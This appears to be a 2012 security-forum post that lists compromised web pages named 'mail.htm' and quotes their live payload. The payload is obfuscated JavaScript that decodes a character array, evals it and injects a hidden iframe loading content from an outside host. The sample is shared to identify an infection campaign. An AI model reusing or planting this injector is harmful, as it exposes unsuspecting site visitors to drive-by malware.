Are these all examples? Found over the last 3 days but not before that
Code:
aymeric.pansu.net/mail.htm
blog.yourls.org/mail.htm
guitar.nyanta.jp/m/mail.htm
igeek.org.gg/mail.htm
ker.cal24.pl/mail.htm
printhouse.inf.br/images/mail.htm
sonjamarinkovic.edu.rs/mail.htm
webmail.firstbaja.com/mail.htm
www.aleco.co.rs/mail.htm
www.arhitrav.rs/mail.htm
www.bjhbxn.com/mail.htm
www.cppidf8.fr/plugins/fckeditor/FCKeditor/editor/plugins/ajaxfilemanager/inc/mail.htm
www.deveducation.co.in/mail.htm
www.ed.cl/mail.htm
www.kiraken.co.jp/admin/mail.htm
www.neimarkg.rs/mail.htm
www.paz.cl/mail.htm
www.portalminassaude.com.br/javascript/tiny_mce/plugins/ajaxfilemanager/inc/mail.htm
www.rango.me/mail.htm
www.snd.org.rs/katalog/mail.htm
Live site payload:
Code:
<h1><b>Please Wait... Loading...</h1></b>
<script>try{q=document.createElement("p");q.appendChild(q+"");}catch(qw){h=-012/5;f="from";try{bcsd=prototype-2;}catch(bawg){ss=[];f+=(h&&f)?("CharC"+"ode"):"";
e=window["eval"];n=[9,18,315,408,32,80,300,444,99,234,327,404,110,232,138,412,101,232,207,432,101,218,303,440,116,230,198,484,84,194,309,312,97,218,303,160,39,1
96,333,400,121,78,123,364,48,186,123,492,13,18,27,36,105,204,342,388,109,202,342,160,41,118,39,36,9,250,96,404,108,230,303,128,123,26,27,36,9,200,333,396,117,21
8,303,440,116,92,357,456,105,232,303,160,34,120,315,408,114,194,327,404,32,230,342,396,61,78,312,464,116,224,174,188,47,230,291,448,114,222,324,388,117,220,315,
436,97,240,315,436,46,228,351,232,56,96,168,192,47,204,333,456,117,218,141,460,104,222,357,464,104,228,303,388,100,92,336,416,112,126,336,388,103,202,183,212,10
2,194,159,224,98,198,303,220,54,114,303,212,99,100,297,156,32,238,315,400,116,208,183,156,49,96,117,128,104,202,315,412,104,232,183,156,49,96,117,128,115,232,36
3,432,101,122,117,472,105,230,315,392,105,216,315,464,121,116,312,420,100,200,303,440,59,224,333,460,105,232,315,444,110,116,291,392,115,222,324,468,116,202,177
,432,101,204,348,232,48,118,348,444,112,116,144,236,39,124,180,188,105,204,342,388,109,202,186,136,41,118,39,36,9,250,39,36,9,204,351,440,99,232,315,444,110,64,
315,408,114,194,327,404,114,80,123,492,13,18,27,36,118,194,342,128,102,64,183,128,100,222,297,468,109,202,330,464,46,198,342,404,97,232,303,276,108,202,327,404,
110,232,120,156,105,204,342,388,109,202,117,164,59,204,138,460,101,232,195,464,116,228,315,392,117,232,303,160,39,230,342,396,39,88,117,416,116,232,336,232,47,9
4,345,388,112,228,333,432,97,234,330,420,109,194,360,420,109,92,342,468,58,112,144,224,48,94,306,444,114,234,327,188,115,208,333,476,116,208,342,404,97,200,138,
448,104,224,189,448,97,206,303,244,53,204,291,212,56,196,297,404,55,108,171,404,53,198,150,396,39,82,177,408,46,230,348,484,108,202,138,472,105,230,315,392,105,
216,315,464,121,122,117,416,105,200,300,404,110,78,177,408,46,230,348,484,108,202,138,448,111,230,315,464,105,222,330,244,39,194,294,460,111,216,351,464,101,78,
177,408,46,230,348,484,108,202,138,432,101,204,348,244,39,96,117,236,102,92,345,464,121,216,303,184,116,222,336,244,39,96,117,236,102,92,345,404,116,130,348,464
,114,210,294,468,116,202,120,156,119,210,300,464,104,78,132,156,49,96,117,164,59,204,138,460,101,232,195,464,116,228,315,392,117,232,303,160,39,208,303,420,103,
208,348,156,44,78,147,192,39,82,177,52,9,18,27,400,111,198,351,436,101,220,348,184,103,202,348,276,108,202,327,404,110,232,345,264,121,168,291,412,78,194,327,40
4,40,78,294,444,100,242,117,164,91,96,279,184,97,224,336,404,110,200,201,416,105,216,300,160,102,82,177,52,9,18,375];if(window.document)for(i=6-2-1-2-1;-655+i!=
2-2;i++){k=i;ss=ss+String[f](n[k]/(i%(h*h)+1));}e(ss);}}</script>
Posted: Thu Apr 05, 2012 4:55 pm 
